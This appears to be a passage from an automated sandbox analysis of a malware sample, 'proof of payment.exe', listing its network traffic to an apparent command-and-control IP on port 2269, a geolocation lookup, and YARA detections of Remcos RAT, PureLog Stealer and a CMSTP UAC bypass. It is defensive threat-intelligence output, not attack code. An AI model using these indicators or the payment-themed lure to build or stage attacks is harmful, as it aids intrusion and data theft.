                                    May 3, 2024 13:13:36.063458920 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.063585043 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087341070 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087371111 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087380886 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087450027 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087450027 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087491035 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.150016069 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.150089979 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.181829929 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.188807011 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.188889027 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.190850973 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.192580938 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.192631960 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.193766117 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.195595026 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.195647955 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.197668076 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.199816942 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.199867010 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.201909065 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.206943035 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.207019091 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.209820032 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.209954023 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.210016966 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.214730024 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.217143059 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.217215061 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.220021963 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.223978043 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.224051952 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.225641012 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.228579044 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.228657007 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.230835915 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.231559038 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.231648922 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.233676910 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241386890 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241400957 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241446018 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.241652012 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241666079 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241713047 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.241949081 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.242057085 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.244211912 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.244945049 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.244987965 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.248219013 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.248251915 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.249645948 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.249687910 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.261970043 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.261991024 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.262006044 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.262047052 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.262075901 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.263580084 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.263626099 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.264322996 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.270322084 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.270390987 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.272557974 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.274460077 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.274507046 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.279160976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.281301022 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.281358957 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.282332897 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.283293009 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.283339977 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.284413099 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.284459114 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.293143988 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.293194056 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.294292927 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.294331074 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.297538042 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.297594070 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.301636934 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.301702976 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.124497890 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.125848055 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.361592054 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.361660957 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.384435892 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.384511948 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.386377096 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.386457920 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.408183098 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.408265114 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.416218042 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.416270971 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.567717075 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.567904949 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.567918062 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.567961931 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.569037914 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.569097996 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.569437027 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.573673964 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.573774099 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.574582100 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.575753927 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.575824976 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.576689005 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.579411983 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.579472065 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.580579042 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.583446980 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.583564997 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.588540077 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.590224028 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.590270042 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.614728928 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.615520954 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.615581036 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.624651909 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.636684895 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.636749029 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.637619972 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.638535976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.638573885 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.639547110 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.640708923 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.640755892 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.643640995 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.644896984 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.645617962 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.645684004 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.647017956 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.647092104 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.648782969 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.649633884 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.649703979 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.650675058 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.652914047 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.652976990 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.653846025 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.656713009 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.656769037 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.657680988 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.658726931 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.658765078 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.659619093 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.660749912 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.660793066 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.663625956 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.664897919 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.665097952 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.668615103 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.670277119 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.670332909 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.670484066 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.672629118 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.672674894 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.673525095 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.676346064 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.676388025 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.677476883 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.683687925 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.683762074 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.686712980 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.688664913 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.688719034 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.689659119 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.696840048 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.696902990 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.699754000 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.706682920 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.706758022 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.714715004 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.724391937 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.724441051 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.734806061 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.735713005 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.735754013 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:37.738785982 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.740688086 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:37.740772963 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.336313009 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.360572100 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.360637903 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.391453028 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.391469955 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.391479969 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.391522884 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.443286896 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.443300962 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.443348885 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.443456888 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.468219042 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.468285084 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.478491068 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.478547096 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.486814022 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.486865997 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.529963017 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.531872034 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.531946898 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.532840014 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.533838987 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.533942938 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.534776926 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.536669016 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.536750078 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.537653923 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.539854050 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.539931059 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.546236992 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.548624039 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.549366951 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.549413919 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.550313950 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.550429106 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.552324057 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.553323984 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.553375959 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.554265022 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.557566881 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.557631016 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.558413982 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.563293934 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.563364983 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.564851999 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.567522049 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.567579985 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.621535063 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.621932983 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.621997118 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.624413013 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.665910006 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.665925026 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.666074991 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.668374062 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.668386936 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.668457985 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.676690102 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.676769018 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.677951097 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.678009987 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.678021908 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.678035021 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.678056955 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:38.678093910 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:38.678143978 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:44.024947882 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:44.031240940 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:44.031388998 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:45.092355013 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.092453957 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:45.242506027 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242526054 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242537975 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242623091 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:46.184432983 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.184544086 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:46.337882042 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.337903976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.337914944 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.338033915 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.153477907 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.153582096 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.162455082 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.162528992 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.216864109 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.216918945 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:48.761691093 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:48.761703968 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:48.761837006 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:49.776556015 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776573896 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776583910 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776707888 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:49.801345110 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.811790943 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.071721077 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.092324972 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.092339039 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.100250959 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.112308979 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.133222103 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.203352928 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.203447104 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:07.129280090 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:07.130430937 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:08.309111118 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:37.200397015 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:37.203613997 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:37.581279039 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:07.245273113 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:07.246583939 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:15:07.916774988 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:16.222445011 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:16.771461010 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:17.771428108 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:19.458951950 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:22.958928108 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:29.771452904 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:37.276586056 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:37.280456066 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:15:37.759290934 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:43.271445990 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:16:07.301384926 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:07.302922010 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:16:07.669123888 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:37.371004105 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:37.372515917 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:16:37.750976086 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:17:07.491942883 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:17:07.504478931 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:17:07.862972021 CEST22694970837.120.235.122192.168.2.9
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    May 3, 2024 13:13:26.023699999 CEST | 60674 | 53 | 192.168.2.9 | 1.1.1.1
                                    May 3, 2024 13:13:26.113100052 CEST | 53 | 60674 | 1.1.1.1 | 192.168.2.9
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    May 3, 2024 13:13:26.023699999 CEST | 192.168.2.9 | 1.1.1.1 | 0x275a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    May 3, 2024 13:13:26.113100052 CEST | 1.1.1.1 | 192.168.2.9 | 0x275a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                    • geoplugin.net
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.9 | 49715 | 178.237.33.50 | 80 | 3640 | C:\Users\user\Desktop\proof of payment.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    May 3, 2024 13:13:26.285801888 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                    Host: geoplugin.net
                                    Cache-Control: no-cache
                                    May 3, 2024 13:13:26.457278967 CEST | 1173 | IN | HTTP/1.1 200 OK
                                    date: Fri, 03 May 2024 11:13:26 GMT
                                    server: Apache
                                    content-length: 965
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                    Target ID:0
                                    Start time:13:13:16
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe"
                                    Imagebase:0x2d0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
